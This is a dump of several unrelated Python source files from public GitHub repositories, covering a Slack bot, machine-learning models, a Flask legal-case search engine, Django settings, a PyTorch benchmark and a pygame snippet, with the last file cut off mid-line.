else:\n response += self.commands[_CMD]()\n else:\n response += \"I do not understand the command: _*\" + _CMD + \"*_. \" + self._get_help() \n return response \n\n##\n def _get_artifact_info(self, formatted_id, _attribute):\n print('_get_artifact_info' + formatted_id + _attribute)\n _artifact = self._get_artifact_type(formatted_id)\n _rallyresp = self.AYX._artifact_info(formatted_id, _artifact, _attribute)\n print('_get_artifact_info' + ' ' + _artifact)\n return _rallyresp['msg']\n \n##\n def _get_artifact_type(self, formatted_id):\n _K = regex.split('([\\D]+)', formatted_id)[1]\n return self.ARTIFACT_TYPE[_K]\n \n## \n def _get_help(self):\n response = \"I currently support the following commands:\\r\\n\"\n for command in self.commands:\n response += command + '\\r\\n'\n return response \n\n##\n def _quit(self):\n sys.exit(1)\n","repo_name":"ozzieD/rally_slackbot","sub_path":"src/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22703138972","text":"import pandas as pd\nfrom sklearn import model_selection\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\n\nclass Model:\n def __init__(self):\n self.model = None\n \n\n def _read_dataset(self):\n url = \"./resource/iris.csv\"\n names = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'class']\n return pd.read_csv(url, names=names)\n \n def _get_train_test(self, dataset):\n # Split-out validation dataset\n array = dataset.values\n X = array[:,0:4]\n Y = array[:,4]\n validation_size = 0.20\n seed = 7\n return model_selection.train_test_split(X, Y, test_size=validation_size, random_state=seed)\n\n def train(self):\n data = self._read_dataset()\n X_train, X_validation, Y_train, Y_validation = self._get_train_test(data)\n self.model = LogisticRegression()\n 
self.model.fit(X_train, Y_train)\n predictions = self.predict(X_validation)\n # print(accuracy_score(Y_validation, predictions))\n return self\n \n def predict(self, x):\n return self.model.predict(x)\n\nif __name__ == \"__main__\":\n Model().train()","repo_name":"nyutal/flaskRestML","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25629070745","text":"import re\nimport string\nimport textwrap\n\nimport pdfplumber\nfrom flask import Flask, render_template, url_for, request, redirect\n\nimport matplotlib.pyplot as plt\nfrom nltk import word_tokenize, PorterStemmer, WordNetLemmatizer\nfrom nltk.corpus import stopwords\nfrom wordcloud import WordCloud\n\nimport math\n\n\ndocIndexes = []\nbm25Values = []\nvocabulary = dict()\nidfs = dict()\ndocFrequencies = dict()\nabstractsDictionary = dict()\ngAbstract = 'CIVIL APPEAL NO.1474. OF 2015 (Against the judgment dated _16.12.2014 passed by the Peshawar High Court, Peshawar in Writ Petition No.162 of 2014).'\nk = 5\nN = 1000\n\n\ndef extractAbstracts():\n file = open('abstracts.txt', 'r')\n for line in file:\n line = line.strip('\\n')\n data = line.split(':')\n abstractsDictionary[data[0]] = data[1]\n\ndef makeWordCloud(wordsList):\n if len(wordsList) > 0:\n # convert list to string and generate\n unique_string = (\" \").join(wordsList)\n wordcloud = WordCloud(width=400, height=350).generate(unique_string)\n plt.figure(figsize=(15, 8))\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.savefig(\"Static\\\\cloud\" + \".png\", bbox_inches='tight')\n # plt.show()\n plt.close()\n\n\ndef getTokensForDocument(docName):\n words = []\n data = docName.split('/')\n file = open('File cases tokens\\\\' + data[1] + '.txt')\n if file:\n for line in file:\n words.append(line.strip('\\n'))\n return words\n\ndef getAbstract(filename):\n data = filename.split('_')\n return 'Here .... 
' + abstractsDictionary[data[0]]\n\ndef extractAbstractOfDocument(docName):\n abstract = \"\"\n try:\n with pdfplumber.open('AllCases\\\\' + docName) as pdf:\n page = pdf.pages[0]\n text = page.extract_text()\n # onAppeal = re.findall('\\(On\\s[AaPpPpEeAaLl]{6}[^\\)]*\\)', text)\n # if len(onAppeal) > 0:\n # return onAppeal[0]\n ca = re.findall('C[iIvViIlL]{4}[^\\)]*\\)', text)\n if len(ca) > 0:\n return ca[0]\n cp = re.findall('C[IiVviIlL]{4}[^\\)]*\\)', text)\n if len(cp) > 0:\n return cp[0]\n crl = re.findall('C[RrIiMmIiNnAaLl]{7}[^\\)]*\\)', text)\n if len(crl) > 0:\n return crl[0]\n crl = re.findall('C[RrIiMmIiNnAaLl]{7}[^\\)]*\\)', text)\n if len(crl) > 0:\n return crl[0]\n hr = re.findall('H[UuMmAaNn]{4}[^\\)]*\\)', text)\n if len(hr) > 0:\n return hr[0]\n hr = re.findall('H[.RC]{4}[^\\)]*\\)', text)\n if len(hr) > 0:\n return hr[0]\n smc = re.findall('S[uUoO]{2}[^\\)]*\\)', text)\n if len(smc) > 0:\n return smc[0]\n smc = re.findall('S[\\.M\\.C]{4}[^\\)]*\\)', text)\n if len(smc) > 0:\n return smc[0]\n except:\n print('here')\n return abstract\n return abstract\n\n\ndef getTermFrequency(vocId, docId):\n file = open('termFrequency.txt', 'r')\n for line in file:\n data = line.strip('\\n')\n sep = data.split('\\t')\n vId = sep[0]\n if vId == vocId:\n values = sep[1].split(' ')\n for item in values:\n sep2 = item.split(':')\n if docId == sep2[0]:\n return float(sep2[1])\n return 0\n\n\ndef L2NormOfVector(vector):\n result = 0\n total = 0\n for value in vector:\n total = total + (value * value)\n result = math.sqrt(total)\n return result\n\n\ndef countWordsInText(word, text):\n tokens = text.split(' ')\n count = 0\n for token in tokens:\n if token == word:\n count += 1\n return count\n\n\ndef getVocabularyId(voc):\n try:\n return vocabulary[voc]\n except:\n return '0'\n\n\ndef getBm25ForDoc(vocId, docId):\n for item in bm25Values:\n if item[0] == vocId:\n sep = item[1].split(' ')\n for item2 in sep:\n breakItem = item2.split(':')\n if breakItem[0] == docId:\n return float(breakItem[1])\n return 0.0\n\n\ndef getNormalizedVector(vector):\n l2Norm = L2NormOfVector(vector)\n normalized = []\n if l2Norm > 0:\n for value in vector:\n val = float(value / l2Norm)\n normalized.append(val)\n return normalized\n return vector\n\n\ndef getBm25ForQuery(word, vocId, docId, query):\n cw_query = countWordsInText(word, query)\n bm25ForDoc = getBm25ForDoc(vocId, docId)\n bm25 = cw_query * bm25ForDoc\n return bm25\n\n\ndef computeDotProduct(vector1, vector2):\n result = 0\n for i in range(len(vector1)):\n result += vector1[i] * vector2[i]\n return result\n\n\ndef runQuery(queryText):\n relevantdocs = []\n relevantAbstracts = []\n\n queries = [queryText]\n extractAbstracts()\n\n print(abstractsDictionary)\n\n # Read document frequencies\n file = open('documentFrequency.txt', 'r')\n if file:\n for line in file:\n data = line.strip('\\n')\n sep = data.split(' ')\n vocId = sep[0]\n df = int(sep[1])\n docFrequencies[vocId] = df\n\n # Read document indexes\n file = open('documentIndex.txt', 'r')\n for line in file:\n data = line.strip('\\n')\n sep = data.split(' ')\n docIndexes.append(sep)\n file.close()\n\n # Read bm25\n file = open('bm25.txt', 'r')\n for line in file:\n data = line.strip('\\n')\n sep = data.split('\\t')\n bm25Values.append(sep)\n file.close()\n\n # Read vocabulary\n file = open('sortedVocabularyWithNames.txt', 'r')\n for line in file:\n data = line.strip('\\n')\n sep = data.split(' ')\n vocabulary[sep[1]] = sep[0]\n file.close()\n\n # Read idfs\n file = open('idf.txt', 'r')\n for line in 
file:\n data = line.strip('\\n')\n sep = data.split(' ')\n idfs[sep[0]] = float(sep[1])\n\n file.close()\n queryIdx = 1\n\n file2 = open('cosineScores(bm25).txt', 'w')\n\n for query in queries:\n\n docNames = []\n scores = []\n\n query = query.lower()\n query = query.replace('\\n', ' ')\n query = query.replace('™', '')\n query = query.replace('–', '')\n query = query.replace('•', '')\n\n query = query.translate(str.maketrans('', '', string.punctuation))\n query = re.sub(r'\\b\\w{1,3}\\b', '', query)\n query = re.sub(r'\\s+', ' ', query)\n stop_words = set(stopwords.words('english'))\n word_tokens = word_tokenize(query)\n filtered_sentence = [w for w in word_tokens if not w.lower() in stop_words]\n queryTokens = []\n ps = PorterStemmer()\n wordnet_lemmatizer = WordNetLemmatizer()\n for item in filtered_sentence:\n item2 = ps.stem(item)\n queryTokens.append(item2)\n\n # Read tokens for each document\n for item in docIndexes:\n\n wordsSet = set()\n docScoreVector = []\n\n docId = item[0]\n docName = 'File cases tokens\\\\' + item[1] + '.txt'\n file = open(docName, 'r', encoding=\"ISO-8859-1\")\n\n for line in file:\n token = line.strip('\\n')\n if token in queryTokens:\n wordsSet.add(token)\n\n # Document Part\n for word in wordsSet:\n bm25_val = 0\n vocId = getVocabularyId(word)\n if vocId != '0':\n bm25_val = getBm25ForQuery(word, vocId, docId, query)\n docScoreVector.append(float(bm25_val))\n\n bm25Score = 0\n for item in docScoreVector:\n bm25Score += item\n\n if bm25Score > 0:\n scores.append(round(bm25Score, 3))\n docNames.append(docName)\n\n if len(scores) > 0:\n for i in range(len(scores) - 1):\n for j in range(len(scores) - i - 1):\n if scores[j] < scores[j + 1]:\n temp = scores[j]\n scores[j] = scores[j + 1]\n scores[j + 1] = temp\n temp = docNames[j]\n docNames[j] = docNames[j + 1]\n docNames[j + 1] = temp\n\n i = 0\n abstract = ''\n while i < len(scores) and i < 100:\n separate = docNames[i].split('.txt')\n onlyPdf = separate[0].split('File cases tokens\\\\')\n\n if str('AllCases/' + onlyPdf[1]) not in relevantdocs:\n relevantdocs.append('AllCases/' + onlyPdf[1])\n abstract = extractAbstractOfDocument(onlyPdf[1])\n\n if len(abstract) > 170:\n abstract = textwrap.shorten(abstract, width=170, placeholder=\"...\")\n if abstract == '':\n abstract = getAbstract(onlyPdf[1])\n else:\n relevantAbstracts.append(abstract)\n file2.write(docNames[i] + ' ' + str(scores[i]) + '\\n')\n i += 1\n\n else:\n file2.write('No Documents Found\\n')\n\n file2.write('\\n')\n\n file2.close()\n print('\\n > All data is saved into text file ...')\n return relevantdocs, relevantAbstracts\n\n\napp = Flask(__name__)\npage1docs = []\npage1Abs = []\npage2docs = []\npage2Abs = []\npage3docs = []\npage3Abs = []\npage4docs = []\npage4Abs = []\npage5docs = []\npage5Abs = []\npage6docs = []\npage6Abs = []\npage7docs = []\npage7Abs = []\npage8docs = []\npage8Abs = []\npage9docs = []\npage9Abs = []\npage10docs = []\npage10Abs = []\nrelevantDocs = []\nrelevantAbstracts = []\nnoOfPages = 0\nisYes = True\nprevQuery = \"\"\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n if request.method == 'POST':\n\n global noOfPages, relevantAbstracts, relevantDocs, isYes, prevQuery\n\n pageNo = request.form['pageNo']\n\n query = request.form['query']\n if query != prevQuery:\n isYes = True\n page1docs.clear()\n page1Abs.clear()\n page2docs.clear()\n page2Abs.clear()\n page3docs.clear()\n page3Abs.clear()\n page4docs.clear()\n page4Abs.clear()\n page5docs.clear()\n page5Abs.clear()\n page6docs.clear()\n page6Abs.clear()\n 
page7docs.clear()\n page7Abs.clear()\n page8docs.clear()\n page8Abs.clear()\n page9docs.clear()\n page9Abs.clear()\n page10docs.clear()\n page10Abs.clear()\n relevantDocs.clear()\n relevantAbstracts.clear()\n\n print(noOfPages)\n print(isYes)\n print(pageNo)\n\n if isYes:\n relevantDocs, relevantAbstracts = runQuery(query)\n\n k = 0\n for doc in relevantDocs:\n if k < 10:\n page1docs.append(doc)\n page1Abs.append(relevantAbstracts[k])\n elif k < 20:\n page2docs.append(doc)\n page2Abs.append(relevantAbstracts[k])\n elif k < 30:\n page3docs.append(doc)\n page3Abs.append(relevantAbstracts[k])\n elif k < 40:\n page4docs.append(doc)\n page4Abs.append(relevantAbstracts[k])\n elif k < 50:\n page5docs.append(doc)\n page5Abs.append(relevantAbstracts[k])\n elif k < 60:\n page6docs.append(doc)\n page6Abs.append(relevantAbstracts[k])\n elif k < 70:\n page7docs.append(doc)\n page7Abs.append(relevantAbstracts[k])\n elif k < 80:\n page8docs.append(doc)\n page8Abs.append(relevantAbstracts[k])\n elif k < 90:\n page9docs.append(doc)\n try:\n page9Abs.append(relevantAbstracts[k])\n except:\n page9Abs.append(gAbstract)\n elif k < 100:\n page10docs.append(doc)\n try:\n page10Abs.append(relevantAbstracts[k])\n except:\n page10Abs.append(gAbstract)\n\n k += 1\n prevQuery = query\n noOfPages = math.ceil(len(relevantDocs) / 10)\n isYes = False\n\n if pageNo == '1':\n wordsListForWordCloud = []\n for doc in page2docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page2docs), queryText=query,\n docs=page2docs, abstracts=page2Abs, pageNo=int(pageNo) + 1)\n elif pageNo == '2':\n wordsListForWordCloud = []\n for doc in page3docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page3docs), queryText=query,\n docs=page3docs, abstracts=page3Abs, pageNo=int(pageNo) + 1)\n elif pageNo == '3':\n wordsListForWordCloud = []\n for doc in page4docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page4docs), queryText=query,\n docs=page4docs, abstracts=page4Abs, pageNo=int(pageNo) + 1)\n elif pageNo == '4':\n wordsListForWordCloud = []\n for doc in page5docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page5docs), queryText=query,\n docs=page5docs, abstracts=page5Abs, pageNo=int(pageNo) + 1)\n elif pageNo == '5':\n wordsListForWordCloud = []\n for doc in page6docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page6docs), queryText=query,\n docs=page6docs, abstracts=page6Abs, pageNo=int(pageNo) + 1)\n elif pageNo == '6':\n wordsListForWordCloud = []\n for doc in page7docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page7docs), 
queryText=query,\n docs=page7docs, abstracts=page7Abs, pageNo=int(pageNo) + 1)\n elif pageNo == '7':\n wordsListForWordCloud = []\n for doc in page8docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page8docs), queryText=query,\n docs=page8docs, abstracts=page8Abs, pageNo=int(pageNo) + 1)\n elif pageNo == '8':\n wordsListForWordCloud = []\n for doc in page9docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page9docs), queryText=query,\n docs=page9docs, abstracts=page9Abs, pageNo=int(pageNo) + 1)\n elif pageNo == '9':\n wordsListForWordCloud = []\n for doc in page10docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page10docs), queryText=query,\n docs=page10docs, abstracts=page10Abs, pageNo=int(pageNo) + 1)\n else:\n wordsListForWordCloud = []\n for doc in page1docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page1docs), queryText=query,\n docs=page1docs, abstracts=page1Abs, pageNo=int(pageNo) + 1)\n\n else:\n return render_template('index.html')\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"SyedAhtsham/Pakistani-Law-Cases-Search-Engine","sub_path":"myproject/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"928885490","text":"import tensorflow as tf\n\nclass BiLSTM_Attention(object):\n def __init__(self, seq_len, \n vocab_size,\n embedding_dim,\n hidden_size,\n attention_size,\n label_size,\n learning_rate,\n random_embedding=True,\n word_embedding=None):\n self.seq_len = seq_len\n self.vocab_size = vocab_size\n self.embedding_dim = embedding_dim\n self.hidden_size= hidden_size\n self.attention_size = attention_size\n self.label_size = label_size\n self.learning_rate = learning_rate\n self.random_embedding = random_embedding\n self.word_embedding = word_embedding\n\n self._build_graph()\n\n def _build_graph(self):\n self.input_x = tf.placeholder(tf.int32, shape=[None, self.seq_len], name=\"input_x\")\n self.input_y = tf.placeholder(tf.int32, shape=[None, self.label_size], name=\"input_y\")\n self.dropout_keep_prob = tf.placeholder(tf.float32, name=\"dropout_keep_prob\") \n\n with tf.name_scope(\"embedding\"):\n if not self.random_embedding:\n self.embedding_table = tf.Variable(tf.cast(self.word_embedding, \\\n dtype=tf.float32, name=\"word2vec\"), \n name=\"embedding_table\")\n else:\n self.embedding_table = tf.Variable(tf.random.uniform([self.vocab_size, self.embedding_dim], \\\n -1.0, 1.0), \n name=\"embedding_table\")\n input_embedding = tf.nn.embedding_lookup(self.embedding_table, self.input_x)\n\n hiddens, _ = self.bilstm(input_embedding, self.hidden_size, self.seq_len)\n x_embedding = tf.concat(hiddens, axis=-1) # (batch_size, max_time, hidden_size*2)\n attention_output, alphas= self.attention(x_embedding, self.attention_size)\n attention_output = 
tf.nn.dropout(attention_output, self.dropout_keep_prob)\n \n # 全连接层\n with tf.variable_scope(\"full_net\"):\n attention_output_shape = attention_output.shape\n W = tf.Variable(tf.random_normal(shape=[attention_output_shape[-1].value, self.label_size]\\\n , stddev=0.1), \n name='W')\n b = tf.Variable(tf.random_normal([self.label_size], stddev=0.1), name=\"b\")\n full_output = tf.matmul(attention_output, W) + b\n self.logits = tf.nn.dropout(full_output, self.dropout_keep_prob)\n self.prob = tf.nn.softmax(self.logits)\n self.prediction = tf.argmax(self.prob, axis=1)\n\n # y = tf.one_hot(self.input_y, self.label_size)\n loss = tf.nn.softmax_cross_entropy_with_logits(logits=self.logits,\\\n labels=self.input_y)\n self.loss = tf.reduce_mean(loss, axis=0)\n # self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)\n self.optimizer = tf.train.AdamOptimizer(self.learning_rate)\n self.grads_and_vars = self.optimizer.compute_gradients(self.loss)\n # correct_prediction = tf.equal(tf.cast(self.prediction, tf.int32), self.input_y)\n correct_prediction = tf.equal(self.prediction, tf.argmax(self.input_y, 1))\n self.acc = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), axis=0, name=\"acc\")\n\n def attention(self, inputs, attention_size, mask=True):\n with tf.variable_scope(\"attention\"):\n # hidden_size = tf.shape(inputs)[-1]\n hidden_size = inputs.shape[2].value\n W = tf.Variable(tf.random_normal(shape=[hidden_size, attention_size], stddev=0.1))\n b = tf.Variable(tf.random_normal(shape=[attention_size], stddev=0.1))\n u = tf.Variable(tf.random_normal(shape=[1, attention_size], stddev=0.1))\n\n v = tf.tanh(tf.matmul(inputs, W) + b) # (batch_size, len, attention_size)\n uv = tf.reduce_sum(tf.matmul(v, tf.transpose(u, [1,0])), axis=-1)\n alphas = tf.nn.softmax(uv, axis=-1)\n\n output = tf.reduce_sum(inputs * tf.expand_dims(alphas, -1), 1)\n\n return output, alphas\n\n def rnn_cell(self, hidden_size, name, cell_type='lstm'):\n with tf.variable_scope(name):\n if cell_type==\"lstm\":\n cell = tf.contrib.rnn.LSTMCell(num_units=hidden_size)\n else:\n cell = tf.contrib.rnn.GRUCell(num_units=hidden_size)\n return cell \n\n def bilstm(self, x, hidden_size, seq_len, cell_type=\"lstm\", name=\"bilstme\"):\n with tf.name_scope(name):\n cell_fw = self.rnn_cell(hidden_size, \"fw_\"+name) \n cell_bw = self.rnn_cell(hidden_size, \"bw_\"+name) \n hidden_states, last_states = tf.nn.bidirectional_dynamic_rnn(cell_fw=cell_fw, \n cell_bw=cell_bw, \n inputs = x,\n # sequence_length=seq_len,\n dtype=tf.float32,\n scope=name)\n return hidden_states, last_states\n\n","repo_name":"Fisher87/ai_explore","sub_path":"nlp_explore/task/classify/bilstm_attention.py","file_name":"bilstm_attention.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"61"} +{"seq_id":"38855214321","text":"import mdl\n\ndef run(filename, outfile):\n \"\"\"\n This function runs an mdl script\n \"\"\"\n p = mdl.parseFile(filename)\n\n if p:\n (commands, symbols) = p\n else:\n print(\"Parsing failed.\")\n return\n\n view = [0,\n 0,\n 1];\n ambient = [50,\n 50,\n 50]\n light = [[0.5,\n 0.75,\n 1],\n [255,\n 255,\n 255]]\n\n color = [0, 0, 0]\n\n step_3d = 100\n consts = ''\n coords = []\n coords1 = []\n symbols['.white'] = ['constants',\n {'red': [0.2, 0.5, 0.5],\n 'green': [0.2, 0.5, 0.5],\n 'blue': [0.2, 0.5, 0.5]}]\n reflect = '.white'\n\n print(symbols)\n constsstr = \"__DEF__\\n\"\n for symbolname, symbolval in symbols.items():\n if 
symbolval[0] == 'constants':\n constsstr += '__CONST__\\n'\n constsstr += symbolname + ' '\n symbolval = symbolval[1];\n for c in symbolval:\n for i in range(3):\n constsstr += str(symbolval[c][i]) + ' '\n constsstr += '\\n'\n elif symbolval[0] == 'knob':\n constsstr += '__KNOB__\\n'\n constsstr += symbolname + '\\n'\n \n print(constsstr)\n for command in commands:\n print(command)\n commandsstr = \"__RUN__\\n\"\n for command in commands:\n if command['op'] != 'constants':\n commandsstr += '__OP__\\n'\n commandsstr += command['op'] + '\\n'\n commandsstr += 'args '\n if command.get('args') != None:\n for arg in command['args']:\n commandsstr += str(arg) + ' '\n commandsstr += '\\n'\n if command.get('func') != None:\n commandsstr += 'func ' + str(command['func']) + '\\n'\n for key in command:\n if key != 'op' and key != 'args' and key != 'func' and command[key] != None:\n commandsstr += key + ' '\n commandsstr += str(command[key]) + '\\n'\n print(commandsstr)\n\n with open(outfile, \"w\") as f:\n f.write(constsstr)\n f.write(commandsstr)\n f.close()","repo_name":"cnelson20/graphics_final_project","sub_path":"src/py/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43398966012","text":"# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'ty4wmd=&yopk#u*q4l)00#2!#e15a^@-z_tv(pc3t^edv)sh&r'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = ['iat-bookshelf.herokuapp.com', 'localhost']\n\n\n# Application definition\n\nINSTALLED_APPS = (\n'grappelli',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'bookshelf.modules.dashboard',\n 'bookshelf.modules.api',\n\n)\n\nROOT_URLCONF = 'bookshelf.config.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'bookshelf.config.apache.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/1.8/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.8/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.8/howto/static-files/\n\nPROJECT_ROOT = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nAPP_ROOT = os.path.join(PROJECT_ROOT, 'modules/dashboard')\nSTATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')\nSTATIC_URL = '/static/'\n\n\n# Extra lookup directories for collectstatic to find static files\nSTATICFILES_DIRS = (\n os.path.join(APP_ROOT, 
'static'),\n)\n\nGRAPPELLI_ADMIN_TITLE = \"Bookshelf Interface\"\nLOGIN_REDIRECT_URL = \"/dashboard\"","repo_name":"inderpartap/digital-bookshelf","sub_path":"bookshelf/config/settings/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"40501822439","text":"#!/usr/bin/env python3\n\nimport torch\nimport sys\nimport torch.distributed as dist\nfrom data.data import load_data\nfrom models.utils import init_multi_gpu_model\nimport utils.utils as utils\nfrom utils.flags import Flags\n\n\ndef run_training_process_on_given_gpu(rank, data, queue):\n \"\"\"Run training/evaluation on given gpu id (rank).\n \"\"\"\n try:\n args = data.args\n model = init_multi_gpu_model(rank, args)\n protocol = utils.Protocol(rank, args, model, data)\n train_dataloader = data.get_train_dataloader()\n eval_dataloader = data.get_eval_dataloader()\n \n for epoch in range(1 + args.load_from_epoch, 1 + args.load_from_epoch + args.num_epochs):\n protocol.start_epoch(epoch) \n if not args.eval_only:\n protocol.set_to_train_mode()\n for step, batch in enumerate(train_dataloader, 1):\n model_input, model_target_output = model.do_batch_processing(batch)\n model.optimizer.zero_grad()\n with torch.autocast(device_type=args.device, dtype=args.dtype, enabled=args.auto_mixed_precision):\n model_output = model(*model_input)\n loss = model.do_backpropagation(model_output, model_target_output)\n \n if step % args.calc_every == 0 or step == data.total_steps_train:\n\n protocol.show_progress(rank, epoch, step, data.total_steps_train, loss)\n protocol.finish_epoch(rank, epoch, model)\n\n if args.eval:\n protocol.set_to_eval_mode()\n\n with torch.no_grad():\n for step, batch in enumerate(eval_dataloader, 1):\n model_input, model_target_output = model.do_batch_processing(batch)\n with torch.autocast(device_type=args.device, dtype=args.dtype, enabled=args.auto_mixed_precision):\n model_output = model(*model_input)\n protocol.evaluation.evaluate_step(model_output, model_target_output)\n if step % args.calc_every == 0 or step == data.total_steps_eval:\n protocol.show_progress(rank, epoch, step, data.total_steps_eval) \n protocol.finish_epoch(rank, epoch) \n protocol.finish_benchmark()\n\n except KeyboardInterrupt:\n protocol.cancel_procedure()\n except RuntimeError as local_error_report:\n protocol.error_procedure(local_error_report, queue)\n\n \n\ndef main():\n flags = Flags()\n args = flags.args\n try:\n if args.live_plot:\n _ = utils.run_live_plot_thread(args.num_gpus, args.refresh_interval)\n\n data = load_data(args)\n\n if args.pred_pic_label:\n model = init_multi_gpu_model(0, args)\n model.predict_label_for_single_picture()\n\n elif args.distributed:\n queue = torch.multiprocessing.get_context('spawn').Queue()\n torch.multiprocessing.spawn(\n run_training_process_on_given_gpu, args=(data, queue), nprocs=args.num_gpus, join=True\n )\n else:\n run_training_process_on_given_gpu(0, data, None)\n except KeyboardInterrupt:\n pass\n\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"aime-team/pytorch-benchmarks","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"39119999029","text":"from flask import Blueprint\nfrom database import Query\nfrom database import visit_occurence_sql, person_sql\n\nfrom app import db\n\nstats = Blueprint('stats', __name__)\n\n# 환자 통계 
/stats/patient\n# In : None\n# Out: {\"통계 종류\": \"통계 값\"}\n@stats.route('/patient', methods = ['GET'])\ndef patient():\n q = Query(db)\n result = {}\n for type, query in visit_occurence_sql.stats_operation.items():\n q.execute(query)\n fetch = q.fetch()\n result.setdefault(type, fetch)\n q.close()\n del q\n return result\n\n# 방문 통계 /stats/visit\n# In : None\n# Out: {\"통계 종류\": \"통계 값\"}\n@stats.route('/visit', methods = ['GET'])\ndef visit():\n q = Query(db)\n result = {}\n for type, query in person_sql.stats_operation.items():\n q.execute(query)\n fetch = q.fetch()\n result.setdefault(type, fetch)\n q.close()\n del q\n return result\n","repo_name":"gwanryo/sturdy-guacamole","sub_path":"server/route/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33066014209","text":"import pygame\n\n# 游戏的初始化\npygame.init()\n# 创建游戏窗口 480*700 返回屏幕对象\nscreen = pygame.display.set_mode((480, 700))\n# 绘制背景图像\nbg = pygame.image.load(\"./images/background.png\")\nscreen.blit(bg, (0, 0))\n\n# 绘制英雄图像\nhero = pygame.image.load(\"./images/me1.png\")\nscreen.blit(hero, (150, 300))\n\n# 可以在所有绘制工作完成之后,统一调用update方法\npygame.display.update()\n\n# 创建时钟对象\nclock = pygame.time.Clock()\n\n# 创建英雄矩形 记录英雄的初始位置\nhero_rect = 